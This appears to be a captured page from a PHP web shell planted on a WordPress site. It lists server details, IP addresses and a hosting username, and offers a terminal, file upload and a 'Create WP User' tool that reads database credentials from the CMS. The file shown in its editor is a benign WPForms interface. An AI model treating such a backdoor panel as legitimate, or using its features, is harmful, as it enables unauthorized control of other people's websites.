Linux webm017.cluster130.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid x86_64
PHP/7.4.33
服务器IP :
10.130.20.17
& 您的IP :
216.73.217.47
域名 :
无法读取 [ /etc/named.conf ]
用户 :
koaigpw
上传
终端
新建文件
新建文件夹
Create WP User
登出
+
/
home
/
koaigpw
/
budomat.net.pl
/
wp-content
/
plugins
/
wpforms-lite
/
src
/
Integrations
/
Divi
/
Interfaces
/
[ 返回根目录 ]
名称
大小
权限
修改时间
操作
..
-
-
-
FormsResolverInterface.php
975.00 B
-rw-r--r--
2026-02-24 15:21
LocalizedDataInterface.php
576.00 B
-rw-r--r--
2026-02-24 15:21
>_
终端
关闭 ✕
输入 'help' 查看可用命令。
koaigpw@
>
新建文件
文件名
取消
创建
重命名
新名称
取消
重命名
Create WordPress User
Auto (baca dari file CMS)
Manual (isi kredensial DB)
代码编辑器 :
FormsResolverInterface.php
<?php namespace WPForms\Integrations\Divi\Interfaces; use WP_Post; /** * Interface FormsResolverInterface. * * Defines methods for resolving and managing WPForms forms in Divi integration. * * @since 1.9.9 */ interface FormsResolverInterface { /** * Get all available forms. * * @since 1.9.9 * * @return array Array of WP_Post objects representing forms. */ public function get_forms(): array; /** * Add a form to the option array. * * @since 1.9.9 * * @param array $options Existing options array. * @param WP_Post $form Form WP_Post object to add. * * @return array Updated options array with the form added. */ public function add_form_in_options( array $options, WP_Post $form ): array; /** * Get form options for all available forms. * * Retrieves all forms and formats them as an option array. * * @since 1.9.9 * * @return array Array of form options. */ public function get_form_options(): array; }
关闭
保存